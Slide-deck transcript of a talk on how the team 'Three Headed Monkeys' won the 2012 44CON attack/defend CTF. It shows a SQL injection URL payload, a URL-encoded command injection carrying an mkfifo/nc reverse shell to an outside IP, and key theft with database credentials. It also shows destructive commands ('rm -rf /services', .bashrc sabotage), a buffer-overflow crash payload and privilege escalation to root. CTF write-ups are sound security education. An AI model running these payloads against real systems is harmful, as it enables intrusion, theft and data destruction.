playing 44con ctf for fun and profit
DESCRIPTION
Rundown of what it took to win the MWRLabs 44CON CTF in 2012 by the winning team 'Three Headed Monkeys'TRANSCRIPT
Playing the 44Con CTF for fun & profit
Me
Software developerTrying not to make things worseKnow a lot about bugs
CTF team 0xbadf00d
Contributor to io.smashthestack.org
CTF
"It's kind of like a Computer Science exam on acid"*
* CSAW CTF "About"page
Solving technical security challenges to get points.
CTF Types
Challenge-basedDEF CON qualsGhost In The ShellcodeCSAW CTF
Attack/defendDEF CON finals44Con CTF (this year)
44CON CTF
44CON CTF - What we got
Virtual Machine image
IP Address
Scope of "attackable" machines
Attack & Defend
Kind of like a pentest(maybe, I've never done a pentest)
I have a plan:ReconHardenWrite exploitsRun riotGet the girlSave the world
Step 1 - Recon
I'd rather be offline than owned
Self-recon
Capture traffic
Quick nmap of non-player servers
Recon - Services
Recon - Services
Recon - Scoring
Regular "scoring rounds"Score server stores new keys in servicesScore server checks for previous keys?
Every 30 minutesNot great if you're trying to see talks!
pastie
Pastie
Pastie
Pastie
Written in PHP
Pastes stored in a MySQL databaseRecon shows keys are stored as pastes
PHP+MySQL - Can you tell what the vuln is yet?
Pastie vuln
Pastie vuln
C Classic SQL injection
Pastie fix
It's not all pwnpwnpwn
Not very sexy
Updated to use prepared statements
Pastie exploit
I want keys!
Had a look at my own DB to figure out the query
Pastie exploit
https://ip/view/%'+and+lang+=+'text'+order+by+date+desc+--+
Pastie exploit
Pastie exploit - scripted
mailserver
Mailserver
SMTP and POP3 server
Keys are stored in emails
Written in RubyI don't know Ruby~ 500 lines
Mailserver - vulnerability
Mailserver - vulnerability
???
This just runs whatever Ruby code you give it
Time to learn Ruby!
Mailserver - verification
Looking at the logs...
Mailserver - exploitation
I'm sure Ruby is lovely...
... but let's just find some code to copy
Mailserver - exploitation
Mailserver - exploitation
Mailserver - scripted exploitation
auth
Auth
Running on port 23500
Auth
Auth - vulnerability
Source analysis 101
Auth - exploitation
Auth - exploitation
Classic stack buffer overflow
Overwrite return address with value of my choice
Remote code execution.....
....right?
Auth - exploitation
Welcome to CTF rage
Auth - exploitation
Auth - exploitation
Just put a valid writable address in the buffer ptr!
Easy if this was a 32bit process.
Our memory space is annoying.
Auth - exploitationgdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x403000 0x3000 0x0 /services/auth/auth
0x602000 0x603000 0x1000 0x2000 /services/auth/auth
0x603000 0x604000 0x1000 0x3000 /services/auth/auth
0x604000 0x625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
Auth - exploitationgdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth
0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth
0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth
0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)
Auth - exploitation
Time's up!
No remote code execution :-(
Very limited DoSCrash processRestarts automatically
servicemon
Servicemon
Web page
Looks like it monitors the other services
Ruby again
Servicemon - vulnerability
Command execution of "filelist" parameter
Servicemon - exploitation
Never mind keys, I want a shell
contestant@ubuntu:~$ nc -l 31337 -e /bin/shnc: invalid option -- 'e'
Servicemon - exploitation
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f
*cracks knuckles*
http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202>%261%7Cnc%20192.168.1.75%2031337%20>%2Ftmp%2Ff
Servicemon - exploitationcontestant@ubuntu:~$ nc -lv 31337Connection from 192.168.1.72 port 31337 [tcp/*] accepted$ whoamicontestant$ pwd/services/servicemon
Now we can have some fun!
rampage
Steal all the keysmysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;"
mysql --user=pastie --password=J@cobsClub\$ paste -e "select pastie from pastie order by date desc limit 1;"
OUTPUT=redis-cli -r 1 keys \* | tail -n 1redis-cli -r 1 lrange $OUTPUT 0 1
Leave a calling card
echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win
Annoy
echo 'export PROMPT_COMMAND="cd"' >> ~/.bashrc
echo exit >> ~/.bashrc
rm -rf /services
escalation
Escalation
Getting keys is fine
Getting shells is better
Getting root is best
Escalation - the hard way$ find /etc -writable/etc/init/mail.conf/etc/init/auth.conf
Escalation - the hard wayUSER PID TTY STAT COMMANDroot 8680 ? Ss /services/auth/auth
Escalation - the hard way
Next time auth respawns we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*] accepted# whoamiroot
Escalation - the easy way220 Mail Service ready (33147)HELO250 Requested mail action okay, completedEXPN respond(client, `whoami`)root
summary
Summary
CTFs are fun!
http://smashthestack.org- start with io
http://overthewire.org
http://hackthissite.org
questions